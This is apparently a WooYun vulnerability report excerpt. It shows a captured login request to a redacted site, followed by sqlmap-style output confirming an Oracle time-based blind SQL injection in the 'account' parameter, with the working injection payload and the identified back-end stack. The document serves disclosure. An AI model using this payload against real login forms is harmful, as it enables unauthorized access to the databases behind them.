WooYun.org

POST /includes/ajaxProcessor.do HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 43
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/login.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=d84a88894daa016a57b9be09810153fe; CNZZDATA30034106=cnzz_eid%3D522374524-1441069361-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1441069361
act=check_user&account=admin&password=admin

---
Parameter: account (POST)
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query - comment)
    Payload: act=check_user&account=admin') AND 4752=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2
,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)--&password=admin
---
[10:21:10] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, PHP 5.2.9
back-end DBMS: Oracle